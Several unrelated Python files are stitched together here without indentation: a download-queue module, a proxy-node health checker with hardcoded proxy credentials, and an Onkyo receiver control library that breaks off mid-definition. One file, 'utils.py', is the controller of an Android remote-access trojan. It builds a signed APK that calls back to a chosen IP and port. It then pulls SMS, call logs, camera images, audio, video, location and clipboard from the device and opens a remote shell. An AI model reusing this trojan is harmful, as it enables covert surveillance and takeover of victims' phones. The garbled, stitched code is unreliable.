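# client = GraphQLClient('https://example.com/api/graphql')
# client.inject_token('Bearer <api-token>')
# result = client.execute('query { viewer { id } }')
# print(result)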
|
utils.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import base64
import time
import binascii
import select
import pathlib
import platform
import re
from subprocess import PIPE, run
from colorama import Fore, Style,init
from pyngrok import ngrok
import socket
import threading
import itertools
import queue
banner = """\033[1m\033[91m
_________-----_____
_____------ __ ----_
___---- ___------ \
----________ ---- \
-----__ | _____)
__- / \
_______----- ___-- \ /)\
------_______ ---____ \__/ /
-----__ \ -- _ /\
--__--__ \_____/ \_/\
----| / |
| |___________|
| | ((_(_)| )_)
| \_((_(_)|/(_)
\ (
\_____________)
\033[93m- By Retr0
"""
pattern = '\"(\\d+\\.\\d+).*\"'
def stdOutput(type_=None):
if type_=="error":col="31m";str="ERROR"
if type_=="warning":col="33m";str="WARNING"
if type_=="success":col="32m";str="SUCCESS"
if type_ == "info":return "\033[1m[\033[33m\033[0m\033[1m\033[33mINFO\033[0m\033[1m] "
message = "\033[1m[\033[31m\033[0m\033[1m\033["+col+str+"\033[0m\033[1m]\033[0m "
return message
def animate(message):
chars = "/—\\|"
for char in chars:
sys.stdout.write("\r"+stdOutput("info")+"\033[1m"+message+"\033[31m"+char+"\033[0m")
time.sleep(.1)
sys.stdout.flush()
def clearDirec():
if(platform.system() == 'Windows'):
clear = lambda: os.system('cls')
direc = "\\"
init(convert=True)
else:
clear = lambda: os.system('clear')
direc = "/"
return clear,direc
clear,direc = clearDirec()
if not os.path.isdir(os.getcwd()+direc+"Dumps"):
os.makedirs("Dumps")
def is_valid_ip(ip):
m = re.match(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$", ip)
return bool(m) and all(map(lambda n: 0 <= int(n) <= 255, m.groups()))
def is_valid_port(port):
i = 1 if port.isdigit() and len(port)>1 else 0
return i
def execute(command):
return run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
def executeCMD(command,queue):
result = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
queue.put(result)
return result
def getpwd(name):
return os.getcwd()+direc+name;
def help():
helper="""
Usage:
deviceInfo --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts an interactive shell of the device
vibrate [number_of_times] --> vibrates the device the given number of times
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter
"""
print(helper)
def getImage(client):
print(stdOutput("info")+"\033[0mTaking Image")
timestr = time.strftime("%Y%m%d-%H%M%S")
flag=0
filename ="Dumps"+direc+"Image_"+timestr+'.jpg'
imageBuffer=recvall(client)
imageBuffer = imageBuffer.strip().replace("END123","").strip()
if imageBuffer=="":
print(stdOutput("error")+"Unable to connect to the Camera\n")
return
with open(filename,'wb') as img:
try:
imgdata = base64.b64decode(imageBuffer)
img.write(imgdata)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except binascii.Error as e:
flag=1
print(stdOutput("error")+"Not able to decode the Image\n")
if flag == 1:
os.remove(filename)
def readSMS(client,data):
print(stdOutput("info")+"\033[0mGetting "+data+" SMS")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
filename = "Dumps"+direc+data+"_"+timestr+'.txt'
flag =0
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
msg = recvall(client)
try:
txt.write(msg)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except UnicodeDecodeError:
flag = 1
print(stdOutput("error")+"Unable to decode the SMS\n")
if flag == 1:
os.remove(filename)
def getFile(filename,ext,data):
fileData = "Dumps"+direc+filename+"."+ext
flag=0
with open(fileData, 'wb') as file:
try:
rawFile = base64.b64decode(data)
file.write(rawFile)
print(stdOutput("success")+"Succesfully Downloaded in \033[1m\033[32m"+getpwd(fileData)+"\n")
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
if flag == 1:
os.remove(filename)
def putFile(filename):
data = open(filename, "rb").read()
encoded = base64.b64encode(data)
return encoded
def shell(client):
msg = "start"
command = "ad"
while True:
msg = recvallShell(client)
if "getFile" in msg:
msg=" "
msg1 = recvall(client)
msg1 = msg1.replace("\nEND123\n","")
filedata = msg1.split("|_|")
getFile(filedata[0],filedata[1],filedata[2])
if "putFile" in msg:
msg=" "
sendingData=""
filename = command.split(" ")[1].strip()
file = pathlib.Path(filename)
if file.exists():
encoded_data = putFile(filename).decode("UTF-8")
filedata = filename.split(".")
sendingData+="putFile"+"<"+filedata[0]+"<"+filedata[1]+"<"+encoded_data+"END123\n"
client.send(sendingData.encode("UTF-8"))
print(stdOutput("success")+f"Succesfully Uploaded the file \033[32m{filedata[0]+'.'+filedata[1]} in /sdcard/temp/")
else:
print(stdOutput("error")+"File not exist")
if "Exiting" in msg:
print("\033[1m\033[33m----------Exiting Shell----------\n")
return
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
print(" ")
command = input("\033[1m\033[36mandroid@shell:~$\033[0m \033[1m")
command = command+"\n"
if command.strip() == "clear":
client.send("test\n".encode("UTF-8"))
clear()
else:
client.send(command.encode("UTF-8"))
def getLocation(sock):
msg = "start"
while True:
msg = recvall(sock)
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
if("END123" in msg):
return
print(" ")
def recvall(sock):
buff=""
data = ""
while "END123" not in data:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
return buff
def recvallShell(sock):
buff=""
data = ""
ready = select.select([sock], [], [], 3)
while "END123" not in data:
if ready[0]:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
else:
buff="bogus"
return buff
return buff
def stopAudio(client):
print(stdOutput("info")+"\033[0mDownloading Audio")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag =0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Audio_"+timestr+".mp4"
with open(filename, 'wb') as audio:
try:
audioData = base64.b64decode(data)
audio.write(audioData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
print(" ")
if flag == 1:
os.remove(filename)
def stopVideo(client):
print(stdOutput("info")+"\033[0mDownloading Video")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag=0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Video_"+timestr+'.mp4'
with open(filename, 'wb') as video:
try:
videoData = base64.b64decode(data)
video.write(videoData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag = 1
print(stdOutput("error")+"Not able to decode the Video File\n")
if flag == 1:
os.remove("Video_"+timestr+'.mp4')
def callLogs(client):
print(stdOutput("info")+"\033[0mGetting Call Logs")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
msg = recvall(client)
filename = "Dumps"+direc+"Call_Logs_"+timestr+'.txt'
if "No call logs" in msg:
msg.split("\n")
print(msg.replace("END123","").strip())
print(" ")
else:
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
txt.write(msg)
txt.close()
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\033[0m")
if not os.path.getsize(filename):
os.remove(filename)
def get_shell(ip,port):
soc = socket.socket()
soc = socket.socket(type=socket.SOCK_STREAM)
try:
soc.bind((ip, int(port)))
except Exception as e:
print(stdOutput("error")+"\033[1m %s"%e);exit()
soc.listen(2)
print(banner)
while True:
que = queue.Queue()
t = threading.Thread(target=connection_checker,args=[soc,que])
t.daemon = True
t.start()
while t.is_alive(): animate("Waiting for Connections ")
t.join()
conn, addr = que.get()
clear()
print("\033[1m\033[33mGot connection from \033[31m"+"".join(str(addr))+"\033[0m")
print(" ")
while True:
msg = conn.recv(4024).decode("UTF-8")
if(msg.strip() == "IMAGE"):
getImage(conn)
elif("readSMS" in msg.strip()):
content = msg.strip().split(" ")
data = content[1]
readSMS(conn,data)
elif(msg.strip() == "SHELL"):
shell(conn)
elif(msg.strip() == "getLocation"):
getLocation(conn)
elif(msg.strip() == "stopVideo123"):
stopVideo(conn)
elif(msg.strip() == "stopAudio"):
stopAudio(conn)
elif(msg.strip() == "callLogs"):
callLogs(conn)
elif(msg.strip() == "help"):
help()
else:
print(stdOutput("error")+msg) if "Unknown Command" in msg else print("\033[1m"+msg) if "Hello there" in msg else print(msg)
message_to_send = input("\033[1m\033[36mInterpreter:/> \033[0m")+"\n"
conn.send(message_to_send.encode("UTF-8"))
if message_to_send.strip() == "exit":
print(" ")
print("\033[1m\033[32m\t (∗ ・‿・)ノ゛\033[0m")
sys.exit()
if(message_to_send.strip() == "clear"):clear()
def connection_checker(socket,queue):
conn, addr = socket.accept()
queue.put([conn,addr])
return conn,addr
def build(ip,port,output,ngrok=False,ng=None,icon=None):
editor = "Compiled_apk"+direc+"smali"+direc+"com"+direc+"example"+direc+"reverseshell2"+direc+"config.smali"
try:
file = open(editor,"r").readlines()
#Very much uncertainty here, but can't think of any other way to do it xD
file[18]=file[18][:21]+"\""+ip+"\""+"\n"
file[23]=file[23][:21]+"\""+port+"\""+"\n"
file[28]=file[28][:15]+" 0x0"+"\n" if icon else file[28][:15]+" 0x1"+"\n"
str_file="".join([str(elem) for elem in file])
open(editor,"w").write(str_file)
except Exception as e:
print(e)
sys.exit()
java_version = execute("java -version")
version_no = re.search(pattern, java_version.stderr).groups()[0]
if java_version.stderr == "":print(stdOutput("error")+"Java Not Installed");exit()
if float(version_no) < 1.8: print(stdOutput("error")+"Java 8 is required ");exit()
print(stdOutput("info")+"\033[0mGenerating APK")
outFileName = output if output else "lewd.apk"
que = queue.Queue()
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/apktool.jar b Compiled_apk -o "+outFileName,que],)
t.start()
while t.is_alive(): animate("Building APK ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully apk built in \033[1m\033[32m"+getpwd(outFileName)+"\033[0m")
print(stdOutput("info")+"\033[0mSigning the apk")
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/sign.jar "+outFileName+" --override",que],)
t.start()
while t.is_alive(): animate("Signing Apk ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully signed the apk \033[1m\033[32m"+outFileName+"\033[0m")
if ngrok:
clear()
get_shell("0.0.0.0",8000) if not ng else get_shell("0.0.0.0",ng)
print(" ")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Signing Failed")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Building Failed")
|
download.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Background download management."""
from __future__ import print_function, unicode_literals, absolute_import
import os, shutil, tempfile
from threading import Thread, Lock
try: # Python 2
# pylint:disable=import-error
from urllib2 import urlopen, Request, URLError
except ImportError: # Python 3
# pylint:disable=import-error, no-name-in-module
from urllib.request import urlopen, Request
from urllib.error import URLError
from .lnp import VERSION
from . import log
__download_queues = {}
def download_str(url, **kwargs):
"""Instantly download a file from <url> and return its contents. Failed
downloads return None. NOTE: This is a blocking method. Use a download queue
for non-blocking downloads.
Keyword arguments:
encoding
Used to decode the data to text. Defaults to UTF-8.
timeout
Timeout used for the URL request, in seconds. Defaults to 3.
If <encoding> is not provided, UTF-8 is used.
"""
# pylint: disable=bare-except
try:
req = Request(url, headers={'User-Agent':'PyLNP/'+VERSION})
return urlopen(
req, timeout=kwargs.get('timeout', 3)).read().decode(
kwargs.get('encoding', 'utf-8'))
except URLError as ex:
log.e('Error downloading '+url+': '+ex.reason)
except:
log.e('Error downloading '+url)
return None
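# Usage sketch (URL is an illustrative assumption): download_str blocks, so it is
# only suitable for small files such as a version manifest.
# text = download_str('https://example.com/latest-version.txt', timeout=5)
# if text is not None:
#     print(text.strip())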
def download(queue, url, destination, end_callback=None, **kwargs):
"""Adds a download to the specified queue."""
return get_queue(queue).add(url, destination, end_callback, **kwargs)
def queue_empty(queue):
"""Returns True if the specified queue does not exist, or is empty;
otherwise False."""
return queue not in __download_queues or __download_queues[queue].empty()
def get_queue(queue):
"""Returns the specified queue object, creating a new queue if necessary."""
__download_queues.setdefault(queue, DownloadQueue(queue))
return __download_queues[queue]
# pylint:disable=too-many-instance-attributes
class DownloadQueue(object):
"""Queue used for downloading files."""
def __init__(self, name):
self.name = name
self.queue = []
self.on_start_queue = []
self.on_begin_download = []
self.on_progress = []
self.on_end_download = []
self.on_end_queue = []
self.thread = None
self.lock = Lock()
if name == 'immediate':
def _immediate_progress(_, url, progress, total):
if total is not None:
msg = "Downloading %s... (%s/%s)" % (
os.path.basename(url), progress, total)
else:
msg = ("Downloading %s... (%s bytes downloaded)" % (
os.path.basename(url), progress))
print("\r%s" % msg, end='')
self.register_progress(_immediate_progress)
def add(self, url, target, end_callback):
"""Adds a download to the queue.
Params:
url
The URL to download.
target
The target path for the download.
end_callback
A function(url, filename, success) which is called
when the download finishes."""
with self.lock:
if url not in [q[0] for q in self.queue]:
self.queue.append((url, target, end_callback))
log.d(self.name+': queueing '+url+' for download to '+target)
else:
log.d(self.name+': skipping add of '+url+', already in queue')
if not self.thread and self.name != 'immediate':
log.d('Download queue '+self.name+' not running, starting it')
self.thread = t = Thread(target=self.__process_queue)
t.daemon = True
t.start()
if self.name == 'immediate':
log.i('Downloading immediately...')
self.__process_queue()
def empty(self):
"""Returns True if the queue is empty, otherwise False."""
return len(self.queue) == 0
def register_start_queue(self, func):
"""Registers a function func(queue_name) to be called when the queue is
started. If False is returned by any function, the queue is cleared."""
self.on_start_queue.append(func)
def unregister_start_queue(self, func):
"""Unregisters a function func from being called when the queue is
started."""
self.on_start_queue.remove(func)
def register_begin_download(self, func):
"""Registers a function func(queue_name, url) to be called when a
download is started."""
self.on_begin_download.append(func)
def unregister_begin_download(self, func):
"""Unregisters a function func from being called when a download is
started."""
self.on_begin_download.remove(func)
def register_progress(self, func):
"""Registers a function func(queue_name, url, downloaded, total_size) to
be called for download progress reports.
If total size is unknown, None will be sent."""
self.on_progress.append(func)
def unregister_progress(self, func):
"""Unregisters a function from being called for download progress
reports."""
self.on_progress.remove(func)
def register_end_download(self, func):
"""Registers a function func(queue_name, url, filename, success) to be
called when a download is finished."""
self.on_end_download.append(func)
def unregister_end_download(self, func):
"""Unregisters a function func from being called when a download is
finished."""
self.on_end_download.remove(func)
def register_end_queue(self, func):
"""Registers a function func(queue_name) to be called when the
queue is emptied."""
self.on_end_queue.append(func)
def unregister_end_queue(self, func):
"""Unregisters a function func from being called when the queue is
emptied."""
self.on_end_queue.remove(func)
def __process_callbacks(self, callbacks, *args):
"""Calls the provided set of callback functions with <args>."""
results = []
for c in callbacks:
# pylint: disable=bare-except
try:
results.append(c(self.name, *args))
except:
results.append(None)
return results
def __process_queue(self):
"""Processes the download queue."""
# pylint: disable=bare-except
if False in self.__process_callbacks(self.on_start_queue):
with self.lock:
self.queue = []
self.thread = None
return
while True:
with self.lock:
if self.empty():
self.thread = None
break
url, target, end_callback = self.queue[0]
log.d(self.name+': About to download '+url+' to '+target)
self.__process_callbacks(self.on_begin_download, url, target)
dirname = os.path.dirname(target)
if not os.path.isdir(dirname):
os.makedirs(dirname)
outhandle, outpath = tempfile.mkstemp(dir=dirname)
outfile = os.fdopen(outhandle, 'wb')
try:
req = Request(url, headers={'User-Agent':'PyLNP/'+VERSION})
response = urlopen(req, timeout=5)
data = 0
while True:
chunk = response.read(8192)
if not chunk:
break
total = response.info().get('Content-Length')
data += len(chunk)
outfile.write(chunk)
self.__process_callbacks(self.on_progress, url, data, total)
except:
outfile.close()
os.remove(outpath)
log.e(self.name+': Error downloading ' + url, stack=True)
self.__process_callbacks(
self.on_end_download, url, target, False)
if end_callback:
end_callback(url, target, False)
else:
outfile.close()
shutil.move(outpath, target)
log.d(self.name+': Finished downloading '+url)
self.__process_callbacks(
self.on_end_download, url, target, True)
if end_callback:
end_callback(url, target, True)
with self.lock:
self.queue.pop(0)
self.__process_callbacks(self.on_end_queue)
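# Usage sketch (queue name, URL and target path are illustrative assumptions):
# def on_done(url, filename, success):
#     print('finished', url, '->', filename, 'ok' if success else 'failed')
# download('packs', 'https://example.com/pack.zip', '/tmp/pack.zip', on_done)
# # The 'immediate' queue instead downloads synchronously and prints progress.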
|
data.py
|
from panel.api.router.templated import nodeRegister
from panel.config.RootData import RootData
import time
import requests
import threading
class nodeData():
def __init__(self) -> None:
self.nodeList = {}
self.readFile()
self.healthCheckStart()
pass
def healthCheckStart(self):
nodeCheck = threading.Thread(target=self.healthCheck)
nodeCheck.name = "Health Check Thread"
nodeCheck.start()
def healthCheck(self) -> None:
while True:
time.sleep(30)
for i,key in enumerate(self.nodeList):
node = self.nodeList[key]
nodeCheck = threading.Thread(target=self.nodeCheck,args=(node,))
nodeCheck.name = str(f"nodecheck : {node.ID}")
nodeCheck.start()
def nodeCheck(self,node:nodeRegister) ->None:
if node.publicAddress is None or node.publicAddress == "":
self.nodeList[node.ID].status = 0
if node.port is None or node.port == "":
self.nodeList[node.ID].status = 0
ulr = f"https://arknights:ghYDmaf00HiP@{node.publicAddress}:{node.port}"
proxies = {
'https': ulr
}
try:
r = requests.get('https://www.google.com', proxies=proxies)
self.nodeList[node.ID].lastUpdate = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
if r.status_code == 200:
self.nodeList[node.ID].status = 0
if r.status_code != 200:
self.nodeList[node.ID].status = 1
except Exception as e:
self.nodeList[node.ID].lastUpdate = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
self.nodeList[node.ID].status = 1
def readFile(self):
RootData.load(path='panel/config/Root.DataStore')
self.nodeList = RootData.get("nodeList")
if self.nodeList == None:
self.nodeList = {}
RootData.set("nodeList", self.nodeList)
RootData.dump(save_path='panel/config/Root.DataStore')
return
def saveFile(self):
RootData.set("nodeList", self.nodeList)
RootData.dump(save_path='panel/config/Root.DataStore')
def setIndex(self,node : nodeRegister):
index = 0
indexList = [key for key in self.nodeList.keys()]
if node.ID is not None:
return
if node.ID is None:
while True:
if index in indexList:
index+=1
continue
node.ID = index
return
def nodeApend(self,node : nodeRegister) ->None:
self.setIndex(node)
self.nodeList[node.ID] = node
self.saveFile()
return node
def getNodeByIndex(self,index):
if index in self.nodeList.keys():
return self.nodeList[index]
return None
def delNodeByIndex(self,index):
if index in self.nodeList.keys():
self.nodeList.pop(index)
self.saveFile()
nodedata = nodeData()
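# Usage sketch (index 0 is an illustrative assumption; a node must have been
# registered via nodeApend for the lookup to return anything):
# node = nodedata.getNodeByIndex(0)
# if node is not None:
#     print(node.ID, node.status)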
|
core.py
|
import re
import struct
import time
import socket, select
import threading
try:
import queue as queue
except ImportError:
import Queue as queue
import netifaces
from collections import namedtuple
from . import commands
from .utils import ValueRange
class ISCPMessage(object):
"""Deals with formatting and parsing data wrapped in an ISCP
containers. The docs say:
ISCP (Integra Serial Control Protocol) consists of three
command characters and parameter character(s) of variable
length.
It seems this was the original protocol used for communicating
via a serial cable.
"""
def __init__(self, data):
self.data = data
def __str__(self):
# ! = start character
# 1 = destination unit type, 1 means receiver
# End character may be CR, LF or CR+LF, according to doc
return '!1{}\r'.format(self.data)
@classmethod
def parse(cls, data):
EOF = '\x1a'
TERMINATORS = ['\n', '\r']
assert data[:2] == '!1'
eof_offset = -1
# EOF can be followed by CR/LF/CR+LF
if data[eof_offset] in TERMINATORS:
eof_offset -= 1
if data[eof_offset] in TERMINATORS:
eof_offset -= 1
assert data[eof_offset] == EOF
return data[2:eof_offset]
class eISCPPacket(object):
"""For communicating over Ethernet, traditional ISCP messages are
wrapped inside an eISCP package.
"""
header = namedtuple('header', (
'magic, header_size, data_size, version, reserved'))
def __init__(self, iscp_message):
iscp_message = str(iscp_message)
# We attach data separately, because Python's struct module does
# not support variable length strings,
header = struct.pack(
'! 4s I I b 3s',
b'ISCP', # magic
16, # header size (16 bytes)
len(iscp_message), # data size
0x01, # version
b'\x00\x00\x00' #reserved
)
self._bytes = header + iscp_message.encode('utf-8')
# __new__, string subclass?
def __str__(self):
return self._bytes.decode('utf-8')
def get_raw(self):
return self._bytes
@classmethod
def parse(cls, bytes):
"""Parse the eISCP package given by ``bytes``.
"""
h = cls.parse_header(bytes[:16])
data = bytes[h.header_size:h.header_size + h.data_size].decode()
assert len(data) == h.data_size
return data
@classmethod
def parse_header(cls, bytes):
"""Parse the header of an eISCP package.
This is useful when reading data in a streaming fashion,
because you can subsequently know the number of bytes to
expect in the packet.
"""
# A header is always 16 bytes in length
assert len(bytes) == 16
# Parse the header
magic, header_size, data_size, version, reserved = \
struct.unpack('! 4s I I b 3s', bytes)
magic = magic.decode()
reserved = reserved.decode()
# Strangely, the header contains a header_size field.
assert magic == 'ISCP'
assert header_size == 16
return eISCPPacket.header(
magic, header_size, data_size, version, reserved)
def command_to_packet(command):
"""Convert an ascii command like (PVR00) to the binary data we
need to send to the receiver.
"""
return eISCPPacket(ISCPMessage(command)).get_raw()
def normalize_command(command):
"""Ensures that various ways to refer to a command can be used."""
command = command.lower()
command = command.replace('_', ' ')
command = command.replace('-', ' ')
return command
def command_to_iscp(command, arguments=None, zone=None):
"""Transform the given given high-level command to a
low-level ISCP message.
Raises :class:`ValueError` if `command` is not valid.
This exposes a system of human-readable, "pretty"
commands, which is organized into three parts: the zone, the
command, and arguments. For example::
command('power', 'on')
command('power', 'on', zone='main')
command('volume', 66, zone='zone2')
As you can see, if no zone is given, the main zone is assumed.
Instead of passing three different parameters, you may put the
whole thing in a single string, which is helpful when taking
input from users::
command('power on')
command('zone2 volume 66')
To further simplify things, for example when taking user input
from a command line, where whitespace needs escaping, the
following is also supported:
command('power=on')
command('zone2.volume=66')
"""
default_zone = 'main'
command_sep = r'[. ]'
norm = lambda s: s.strip().lower()
# If parts are not explicitly given, parse the command
if arguments is None and zone is None:
# Separating command and args with colon allows multiple args
if ':' in command or '=' in command:
base, arguments = re.split(r'[:=]', command, 1)
parts = [norm(c) for c in re.split(command_sep, base)]
if len(parts) == 2:
zone, command = parts
else:
zone = default_zone
command = parts[0]
# Split arguments by comma or space
arguments = [norm(a) for a in re.split(r'[ ,]', arguments)]
else:
# Split command part by space or dot
parts = [norm(c) for c in re.split(command_sep, command)]
if len(parts) >= 3:
zone, command = parts[:2]
arguments = parts[2:]
elif len(parts) == 2:
zone = default_zone
command = parts[0]
arguments = parts[1:]
else:
raise ValueError('Need at least command and argument')
# Find the command in our database, resolve to internal eISCP command
group = commands.ZONE_MAPPINGS.get(zone, zone)
if not zone in commands.COMMANDS:
raise ValueError('"{}" is not a valid zone'.format(zone))
prefix = commands.COMMAND_MAPPINGS[group].get(command, command)
if not prefix in commands.COMMANDS[group]:
raise ValueError('"{}" is not a valid command in zone "{}"'.format(
command, zone))
# Resolve the argument to the command. This is a bit more involved,
# because some commands support ranges (volume) or patterns
# (setting tuning frequency). In some cases, we might imagine
# providing the user an API with multiple arguments (TODO: not
# currently supported).
if type(arguments) is list:
argument = arguments[0]
else:
argument = arguments
# 1. Consider if there is an alias, e.g. level-up for UP.
try:
value = commands.VALUE_MAPPINGS[group][prefix][argument]
except KeyError:
# 2. See if we can match a range or pattern
for possible_arg in commands.VALUE_MAPPINGS[group][prefix]:
if type(argument) is int or (type(argument) is str and argument.lstrip("-").isdigit() is True):
if isinstance(possible_arg, ValueRange):
if int(argument) in possible_arg:
# We need to send the format "FF", hex() gives us 0xff
value = hex(int(argument))[2:].zfill(2).upper()
if prefix == 'SWL' or prefix == 'CTL':
if value == '00':
value = '0' + value
elif value[0] != 'X':
value = '+' + value
elif value[0] == 'X':
if len(value) == 2:
value = '-' + '0' + value[1:]
value = '-' + value[1:]
break
# TODO: patterns not yet supported
else:
raise ValueError('"{}" is not a valid argument for command '
'"{}" in zone "{}"'.format(argument, command, zone))
return '{}{}'.format(prefix, value)
def iscp_to_command(iscp_message):
for zone, zone_cmds in commands.COMMANDS.items():
# For now, ISCP commands are always three characters, which
# makes this easy.
command, args = iscp_message[:3], iscp_message[3:]
if command in zone_cmds:
if args in zone_cmds[command]['values']:
return zone_cmds[command]['name'], \
zone_cmds[command]['values'][args]['name']
else:
match = re.match('[+-]?[0-9a-f]+$', args, re.IGNORECASE)
if match:
return zone_cmds[command]['name'], \
int(args, 16)
else:
return zone_cmds[command]['name'], args
else:
raise ValueError(
'Cannot convert ISCP message to command: {}'.format(iscp_message))
def filter_for_message(getter_func, msg):
"""Helper that calls ``getter_func`` until a matching message
is found, or the timeout occurs. Matching means the same commands
group, i.e. for sent message MVLUP we would accept MVL13
in response."""
start = time.time()
while True:
candidate = getter_func(0.05)
# It seems ISCP commands are always three characters.
if candidate and candidate[:3] == msg[:3]:
return candidate
# exception for HDMI-CEC commands (CTV) since they don't provide any response/confirmation
if "CTV" in msg[:3]:
return msg
# The protocol docs claim that a response should arrive
# within *50ms or the communication has failed*. In my tests,
# however, the interval needed to be at least 200ms before
# I managed to see any response, and only after 300ms
# reproducibly, so use a generous timeout.
if time.time() - start > 5.0:
raise ValueError('Timeout waiting for response.')
def parse_info(data):
response = eISCPPacket.parse(data)
# Return string looks something like this:
# !1ECNTX-NR609/60128/DX
info = re.match(r'''
!
(?P<device_category>\d)
ECN
(?P<model_name>[^/]*)/
(?P<iscp_port>\d{5})/
(?P<area_code>\w{2})/
(?P<identifier>.{0,12})
''', response.strip(), re.VERBOSE).groupdict()
return info
class eISCP(object):
"""Implements the eISCP interface to Onkyo receivers.
This uses a blocking interface. The remote end will regularily
send unsolicited status updates. You need to manually call
``get_message`` to query those.
You may want to look at the :meth:`Receiver` class instead, which
uses a background thread.
"""
ONKYO_PORT = 60128
CONNECT_TIMEOUT = 5
@classmethod
def discover(cls, timeout=5, clazz=None):
"""Try to find ISCP devices on network.
Waits for ``timeout`` seconds, then returns all devices found,
in form of a list of dicts.
"""
onkyo_magic = eISCPPacket('!xECNQSTN').get_raw()
pioneer_magic = eISCPPacket('!pECNQSTN').get_raw()
# Since due to interface aliasing we may see the same Onkyo device
# multiple times, we build the list as a dict keyed by the
# unique identifier code
found_receivers = {}
# We do this on all network interfaces
# which have an AF_INET address and broadcast address
for interface in netifaces.interfaces():
ifaddrs=netifaces.ifaddresses(interface)
if not netifaces.AF_INET in ifaddrs:
continue
for ifaddr in ifaddrs[netifaces.AF_INET]:
if not "addr" in ifaddr or not "broadcast" in ifaddr:
continue
# Broadcast magic
sock = socket.socket(
socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setblocking(0) # So we can use select()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.bind((ifaddr["addr"], 0))
sock.sendto(onkyo_magic, (ifaddr["broadcast"], eISCP.ONKYO_PORT))
sock.sendto(pioneer_magic, (ifaddr["broadcast"], eISCP.ONKYO_PORT))
while True:
ready = select.select([sock], [], [], timeout)
if not ready[0]:
break
data, addr = sock.recvfrom(1024)
info = parse_info(data)
# Give the user a ready-made receiver instance. It will only
# connect on demand, when actually used.
receiver = (clazz or eISCP)(addr[0], int(info['iscp_port']))
receiver.info = info
found_receivers[info["identifier"]]=receiver
sock.close()
return list(found_receivers.values())
def __init__(self, host, port=60128):
self.host = host
self.port = port
self._info = None
self.command_socket = None
@property
def model_name(self):
if self.info and self.info.get('model_name'):
return self.info['model_name']
else:
return 'unknown-model'
@property
def identifier(self):
if self.info and self.info.get('identifier'):
return self.info['identifier']
else:
return 'no-id'
def __repr__(self):
if self.info and self.info.get('model_name'):
model = self.info['model_name']
else:
model = 'unknown'
string = "<{}({}) {}:{}>".format(
self.__class__.__name__, model, self.host, self.port)
return string
@property
def info(self):
if not self._info:
sock = socket.socket(
socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setblocking(0)
sock.bind(('0.0.0.0', 0))
sock.sendto(eISCPPacket('!xECNQSTN').get_raw(), (self.host, self.port))
ready = select.select([sock], [], [], 0.1)
if ready[0]:
data = sock.recv(1024)
self._info = parse_info(data)
sock.close()
return self._info
@info.setter
def info(self, value):
self._info = value
def _ensure_socket_connected(self):
if self.command_socket is None:
self.command_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.command_socket.settimeout(self.CONNECT_TIMEOUT)
self.command_socket.connect((self.host, self.port))
self.command_socket.setblocking(0)
def disconnect(self):
try:
self.command_socket.close()
except:
pass
self.command_socket = None
def __enter__(self):
self._ensure_socket_connected()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.disconnect()
def send(self, iscp_message):
"""Send a low-level ISCP message, like ``MVL50``.
This does not return anything, nor does it wait for a response
from the receiver. You can query responses via :meth:`get`,
or use :meth:`raw` to send a message and waiting for one.
"""
self._ensure_socket_connected()
self.command_socket.send(command_to_packet(iscp_message))
def get(self, timeout=0.1):
"""Return the next message sent by the receiver, or, after
``timeout`` has passed, return ``None``.
"""
self._ensure_socket_connected()
ready = select.select([self.command_socket], [], [], timeout or 0)
if ready[0]:
header_bytes = self.command_socket.recv(16)
header = eISCPPacket.parse_header(header_bytes)
body = b''
while len(body) < header.data_size:
ready = select.select([self.command_socket], [], [], timeout or 0)
if not ready[0]:
return None
body += self.command_socket.recv(header.data_size - len(body))
return ISCPMessage.parse(body.decode())
def raw(self, iscp_message):
